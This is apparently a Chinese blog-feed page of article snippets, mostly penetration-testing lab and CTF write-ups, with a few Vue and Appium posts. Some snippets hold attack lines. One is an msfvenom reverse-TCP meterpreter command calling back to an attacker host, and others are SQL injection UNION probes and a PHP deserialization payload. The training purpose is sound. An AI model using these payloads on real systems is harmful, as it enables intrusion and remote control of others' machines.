【靶场实战总结】第58页

CTFweb相关靶场推荐与环境配置

的配置而言内容很多有问题的小伙伴欢迎留言哦在线练习平台bugkuXCTF攻防世界比较基础的两个网站题目有很多并且网上有很多题目的writeup而且上面包含有其他类型的题目大家可以都去体验一下感受一下不同题目不同难度的魅力本地主机搭建靶场这部分重点说一下总会有像我一样的一批人对网

k1ling·2022-06-12 20:37

WEB漏洞渗透测试靶场整理资源

WEB漏洞渗透测试靶场整理资源在所有人目光之外，一个人无声的坍塌下去，像是被什么火烧尽了，只余下灰烬整理了一些WEB漏洞本地靶场资源，包括针对性的漏洞专题如SQL注入，XSS等…以及合集类的如DVWA…

浪子燕青啦啦啦·2022-06-12 20:37

pikachu靶场

暴力破解1.基于表单的暴力破解解题步骤：(一)管理员账号admin尝试爆破，在密码处进行字典爆破(二)爆破出密码1234562.验证码绕过（onserver）解题步骤：(一)题目漏洞点，在于验证码长久有效，同样进行burp抓包然后对密码位置进行爆破(二)保持一个正确验证码进行爆破，密码1234563.验证码绕过（onclient）解题步骤：(一)题目漏洞点，在于验证码长久有效，同样进行burp抓包

Fzuim·2022-06-12 20:06

软件测试 | App测试——Appium实战总结，淘宝App测试项目案例

Appium+Python实例一、启动淘宝APP在这里主要给大家推荐一个sdk自带的实用工具aapt。aapt即AndroidAssetPackagingTool，在SDK的build-tools目录下。该工具可以查看apk包名和launcherActivity，当然还有更多的功能，有兴趣的可以查看相关资料。(1)第一步：下载aapt,在android-sdk里面双击SDK-manager,下载b

小梧敲代码·2022-06-10 07:38

Kali与编程：如何快速搭建OWASP网站安全实验靶场？

学网站安全没实验靶场，怎么办？我们强烈推荐OWASP，它是基础UbuntuLinux搭建起来的靶机，里面包含DVWA、bWAPP等子靶场，安装一个靶场顶安装好几个！

Kali与编程～·2022-06-09 18:26

（20）文件上传漏洞：原理、原因、常见触发点分析，vulhub、upload、公开cms上传漏洞多种方法测试

产生上传漏洞原因：原因：常见的问题：危害：触发点，并判断是否存在文件上传漏洞：触发点：查找方法：常见文件上传地址获取：随机搜：针对性：不同格式下的文件类型后门测试：在网站文件目录下模仿后门程序执行在vulhub靶场中进行文件类型测试第一步

黑色地带(崛起)·2022-06-09 18:27

优酷移动端弹幕穿人架构设计与工程实战总结

弹幕穿人方案主要分为两类：“云端离线人体分割+端侧渲染”和“移动端端侧实时人体分割+端侧渲染”。在这里我们分别简称为云端方案和端侧方案。本系列文章主要聚焦在优酷端侧弹幕穿人的技术实战上，主要包括优酷跨平台多媒体渲染引擎OPR简介、优酷端侧弹幕穿人架构设计与工程实战、淘系端智能PixelAI移动端实时人像分割技术、以及优酷弹幕渲染及弹幕穿人渲染技术的方方面面。一、背景1、弹幕穿人的价值弹幕是目前用户

阿里巴巴文娱技术·2022-06-09 16:29

漏洞靶场搭建

在向专业的大佬请教后，打算从CNVD上找近三年发现的高危漏洞，然后在学习去复测，但发现每个漏洞都需要自己搭建靶场，大量的时间都在靶场搭建上，与自己初衷不符，因此在网上搜索了下有没有现成的靶场，最终选择了

nejore·2022-06-09 13:25

WEB安全基础入门—目录遍历（路径遍历\路径穿越攻击）

WEB安全系列包括如下三个专栏：《WEB安全基础-服务器端漏洞》《WEB安全基础-客户端漏洞》《WEB安全高级-综合利用》知识点全面细致，逻辑清晰、结合实战，并配有大量练习靶场，让你读一篇、练一篇，掌握一篇

Eason_LYC·2022-06-08 20:15

WEB安全基础入门—身份验证漏洞

《WEB安全基础-服务器端漏洞》《WEB安全基础-客户端漏洞》《WEB安全高级-综合利用》知识点全面细致，逻辑清晰、结合实战，并配有大量练习靶场，让你读一篇、练一篇，掌握一篇，在学习路上事半功倍，少走弯路

Eason_LYC·2022-06-08 20:14

HTTP Host Header Attack：Basic password reset poisoning

靶场演练：打开靶场，首页如此：去选择忘记密码，期间打开BurpSuite进行抓包

Zeker62·2022-06-08 20:07

Lab: Password reset poisoning via middleware：通过中间件使密码重置中毒靶场复盘

靶场内容该实验室容易受到密码重置中毒的影响。用户carlos会不小心点击他收到的电子邮件中的任何链接。要解决实验室，请登录carlos的帐户。

Zeker62·2022-06-08 20:36

攻防世界高手进阶区4-6关

目录unserialize3题目介绍解题思路访问靶场进行反序列化反序列化结果__wakeup()函数绕过传参O:4:"xctf":2:{s:4:"flag";s:3:"111";}找到flagWeb_php_unserialize

不知名白帽·2022-06-08 12:14

JavaScript中的this例题实战总结详析

目录前言普通函数中的this箭头函数中的this函数作为对象的方法中的this上下文对象调用中的this在构造函数中的thiscall，apply，bind显式修改this指向this优先级箭头函数的this绑定无法修改从手写new操作符中去理解this从手写call、apply、bind中去理解this手写call的实现手写apply的实现手写bind的实现为什么显式绑定的this要比隐式绑定的

·2022-06-07 16:53

Docker搭建靶场初探(主要对坑点进行总结)

本次测试使用DeepinOS(Kernelbasedebian)虚拟机安装Sqli-labs(Docker)首先进入虚拟机配置apt源以及docker仓库镜像安装配置过程中发现坑点如下1.按照官方设置存储库，并将对应的链接改至阿里镜像地址，进行apt-getupdate操作更新出现失败root@PC:/sudoapt-getupdate忽略:1http://mirrors.aliyun.com/d

六亲不认的步伐·2022-06-07 15:39

apache flink目录遍历漏洞（CVE-2020-17518复现）

写远程文件影响版本：Flink1.5.1-1.11.2接下来开始复现：我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场

ANYOUZHEN·2022-06-06 19:02

省HVV初体验(edu)

浙江省HVV初体验此次参加的HVV是edu分会场，总的来说是对HVV有了一个初步的认识，了解实战和靶场练习之间存在的巨大鸿沟。经历了这次HVV，对于渗透测试有了更深一步的理解。

学安全的刘sir·2022-06-05 13:00

Vue —— 项目实战总结（二）

文章目录1.重写push和replace方法2.Home模块组件拆分3.三级联动组件完成4.完成其余的静态组件5.POSTMAN测试接口6.为什么需要进行二次封装axios？7.接口统一管理8.nprogress进度条使用9.vuex状态管理库10.TypeNav三级联动展示数据业务1.重写push和replace方法编程式路由跳转到当前路由（参数不变），多次执行会抛出NavigationDupl

-Baymax-·2022-06-02 13:57

Vulhub靶场搭建教程

##Vulhub靶机环境搭建###Vulhub地址：Vulhub下载地址###一、所需环境####1、Ubuntu16.04####2、最新版本Docker###二、安装之路####1、下载Ubuntu16.04下载地址（迅雷下载64位，下载快速）PS：千万别用32位，32位环境很多6

Zovt·2022-06-02 12:00

关于CVE-2020-1983:Tomcat 文件包含漏洞的问题

目录一、靶场环境1、漏洞：任意文件包含2、影响版本二、搭建环境1、启动环境2、访问3、漏洞利用4、修复建议起序：漏扫完看报告的时候发现的，复现学习一下。

·2022-06-01 12:54

node项目实战总结_vue项目实战总结

马上过年了，最近工作不太忙，再加上本人最近比较懒，毫无斗志，不愿学习新东西，或许是要过年的缘故(感觉像是在找接口)。就把前一段时间做过的vue项目，进行一次完整的总结。这次算是详细总结，会从项目的搭建，一直到最后的服务器上部署。废话不多说了。干货直接上。一、必须node环境,这次就不写node环境的安装了。过两天我会写个node环境的安装随笔。二、node环境配好后。开整vue。1.安装vue脚手

weixin_39943547·2022-05-31 18:37

Vue实战总结

主要讲解Vue（Vue.js+Vuex+TypeScript）实战中遇到的一些技术点。Vue项目中使用TypeScript在vue项目中使用ts有两种情况：在新项目中使用TypeScript在已有Vue项目中使用TypeScript。在新项目中使用TypeScript使用@vue/cli工具创建是选择使用ts即可。创建完的项目中会有两个ts文件。其中shims-ts.d.ts文件是jsx语法的类型

蓝欣执念·2022-05-31 18:37

Vue —— 项目实战总结（一）

文章目录1.创建项目2.目录内容3.路由的配置4.路由的跳转5.路由的元信息6.路由传参7.路由传参的面试题1.创建项目win+r，输入cmd，打开终端输入代码：cddesktop，定位到桌面vuecreatexxx（xxx为项目名）2.目录内容node_modules：放置项目依赖的地方public：一般放置一些公用的静态资源，打包上线的时候，public文件夹里面资源原封不动打包到dist文件

-Baymax-·2022-05-31 18:30

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树（AST）提取

“网络安全提高班”新的100篇文章即将开启，包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结，它将更加聚焦，更加深入，也是作者的慢慢成长史。

Eastmount·2022-05-29 13:56

常见渗透测试靶场

1.DVWA作为新手，通常第一个听说的靶场应该就是DVWA，部署简单安装完对应版本的PAM(PHP-Apache-MySQL)，简单配置后就可以使用。

qfliweimin·2022-05-28 20:27

CSRF漏洞详细解读

CSRF一CSRF介绍1.什么是CSRF2.CSRF漏洞危害二CSRF的三种漏洞1.GET类型CSRF2.POST类型CSRF3.Token类型CSRF三靶场演示四CSRF漏洞修复方法修复方案（1）验证

跳楼梯企鹅·2022-05-26 11:12

渗透靶场--vulnstack-红队评估实战(5)

vulnstack-红队评估实战(5)环境配置win7sun\heart123.comsun\Administratordc123.com内网：192.168.138.136外网：192.168.154.140启动phpstudy2008sun\admin2021.com192.168.138.138kali192.168.154.1291.对外网主机进行信息搜集开放了80和3306，先访问80为

6right·2022-05-23 19:09

渗透靶场--vulnstack-红队评估实战(3)

vulnstack-红队评估实战(3)环境配置攻击者：kali192.168.154.129web192.168.154.135192.168.93.100pc192.168.93.30win2008192.168.93.20win2012192.168.93.10web1-ubantu192.168.93.1201.外网主机信息搜集nmap扫描[外链图片转存失败,源站可能有防盗链机制,建议将图片

6right·2022-05-23 19:39

渗透靶场--vulnstack-红队评估实战(2)

vulnstack-红队评估实战(2)环境配置攻击者：kali192.168.154.129windows192.168.154.1靶场：WEB：对外边界服务器10.10.10.80192.168.154.80PC

6right·2022-05-23 19:38

Vulnstack内网靶场渗透(ATT&CK实战系列-红队评估（七）)

这么久没打vulnhub全是因为在吃这一套内网靶场(绝对没有在摸鱼)，现在把我的思路写下来前言这是Vulnstack里的一套靶场，ATT&CK实战系列-红队评估（七）这是靶场的链接：http://vulnstack.qiyuanxuetang.net

Starry`Quan·2022-05-23 19:38

shiro反序列化漏洞复现

目录简介：靶场环境漏洞复现一、手工复现二、图形化工具简介：ApacheShiro是一个强大易用的Java安全框架，提供了认证、授权、加密和会话管理等功能。

暮晓引流软件·2022-05-21 22:52

靶场提权小全

说是linux提权但在整理的时候不自主的把windows的内容也写了进去，结果变成了大杂烩，也不知道是好还是不好你https://github.com/sagishahar/lpeworkshopWindows提权：FuzzySecurity|WindowsPrivilegeEscalationFundamentalshttps://github.com/netbiosX/Checklists/b

彤彤学安全·2022-05-21 16:18

端口扫描神器 - Nmap的基本使用

搜索公众号：白帽子左一，领配套练手靶场，全套安全课程及工具一、Nmap简介Nmap是一款网络扫描和主机检测的非常有用的工具。可以用于收集信息和枚举，同时可以用来作为一个漏洞探测器或安全扫描器。

zkzq·2022-05-21 16:45

渗透靶场--vulnstack-红队评估实战(4)

vulnstack-红队评估实战(4)环境配置web服务器ubuntu:ubuntu内网192.168.183.131外网192.168.154.137web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613sudosuubuntucd/home/ubuntu/Desktop/vulhub/struts2/s2-045docker-composeup域成

6right·2022-05-20 17:22

Vulnhub靶场之Me-and-My-Girlfriend

先看一下描述：一、靶机搭建1.靶机下载下载地址：https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova2.靶机导入第一步：导入（打开虚拟机–>选择下载的靶机–>选择存储路径–>导入）注：会报导入失败的错误，点击重试即可。第二步：导入后，删除网卡并重新添加（NAT网卡）第三步：启动虚拟机二、信息收集1.nma

要努力。。·2022-05-19 11:28

靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

兄弟们第一天打vulnhub靶场，我kali连靶场ip都扫不到，泪奔了，不说了开整注意：vm虚拟机里面的编辑下面的虚拟机网络编辑器，把除了NAT模式外的模式，其他模式不启动。

汉南帝·2022-05-19 11:56

DVWA靶场-文件上传漏洞

第五关：Fileupload（文件上传）文件上传漏洞，通常是由于对上传文件的类型、内容没有进行严格的过滤、检查，使得攻击者可以通过上传木马获取服务器的webshell权限，因此文件上传漏洞带来的危害常常是毁灭性的，Apache、Tomcat、Nginx等都曝出过文件上传漏洞。LowYourimagewasnotuploaded.';}else{//Yes!echo"{$target_path}su

嘿-零一·2022-05-19 10:42

如何在kali linux中部署文件上传靶场，并在Windows本机访问

这里我没有用之前那个比较经典的文件上传靶场，而是使用国光大佬自己开发的靶场，讲解更详细，界面更好看。

hangshao0.0·2022-05-16 20:48

sql注入之union联合注入

声明1：本文章使用的数据皆为官网公示，为保护信息已做打码声明2：此系列文章仅用于CTF学习及信息安全防御技术，建议读者应用之前在本地搭建数据库或靶场等实践环境，在公网使用相关技术前请通读《网络安全法》union

k1ling·2022-05-16 20:40

whoami靶场渗透测试

文章标题测试环境信息收集获取靶机ip扫描端口扫描目录开始渗透文件下载漏洞获取数据库账号密码知晓sql注入绕过方式登录前端文件上传+包含漏洞getshell失败的提权方法一：ssh登录方法二：反弹shell方法三：菜刀测试环境靶机：云演考试题，whoami靶机（源码没有找到没有在本地搭）攻击机：kali信息收集开始时访问网站发现啥信息也没有获取靶机ipwindows终端ping即可扫描端口kali机

西电卢本伟·2022-05-15 17:54

红日靶场(内网渗透）——2

1.后渗透。之前我们已经将小马上传，在这里用webshell进行进一步渗透。1）基于msf利用msf生成exe，并上传。msfvenom-pwindows/meterpreter_reverse_tcpLHOST=192.168.248.128LPORT=1234-fexe-o

yaolingyu1·2022-05-15 02:00

【SQL注入-02】SQL注入点的简单判断

目录1实验环境2准备工作3判断是否存在SQL注入点及注入的类型4结论：1实验环境实验靶场——虚拟机（IP为172.16.1.1）：本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站

像风一样9·2022-05-14 16:42

封神台SQL注入-基础靶场1-显错注入

文章目录显错注入Pass-01Pass-02Pass-03Pass-04显错注入Pass-01判断注入类型传送门：如何判断注入类型id=1and1=1//有回显id=1and1=2//Noresultsfound判断为数字型注入判断有几列id=1orderby3//有回显id=1orderby4//Noresultsfound判断有三列判断回显点id=1and1=2unionselect1,2,3

原味瓜子、·2022-05-14 16:42

SQL注入-显错注入

目录SQL注入数据库语句流程靶场演示万能密码漏洞万能密码字典SQL注入什么是SQL注入：用户输入的内容被浏览器当做数据库语句进行执行。关键点：我们一定要输入[数据库语句]。

风过留不留声·2022-05-14 16:40

vulnstack1--红队靶机（域渗透）

一、前言这几天一直有点任务，就一直没来得更新，现在继续给大家更新一些贴近真实情况的靶场环境，今天的文章或许会有点长，因为有好多和我一样的小白，所以在这就多墨迹几句，有什么不对的还请大佬们给予批评指正二、

TJA小傲·2022-05-13 12:44

渗透神器----Windows10 渗透工具包

前言这几天一直有工作，所以就没有来的及去更新靶场还有CTF试题，接下来给大家更新一个优秀的工具：2022年最新Windows10渗透工具包镜像系统简介基于Win10Workstation21H2x64MSDN

TJA小傲·2022-05-13 12:41

渗透靶场——HackMyVM:BlackWidow

部署环境提供镜像文件后，直接用虚拟机打开即可，kali攻击机用VMware打开即可，靶机用vbox打开即可kali攻击机ip地址：桥接自动获取ip，此次中间换过一次IP，没有什么影响靶机ip地址：（桥接自动获取ip）目标:user.txt和root.txt信息收集扫描主机arp-scan-l发现存活主机ip地址：192.168.1.118扫描端口扫描靶机开放的服务端口nmap-A-T4-p-192

TJA小傲·2022-05-13 12:40

渗透靶场——HackMyVM:Area51

部署环境提供镜像文件后，直接用虚拟机打开即可，kali攻击机用VMware打开即可，靶机用vbox打开即可此次靶场是针对Log4j2漏洞复现的一个靶场，大家可以直接上手操作一遍靶机ip地址：（桥接自动获取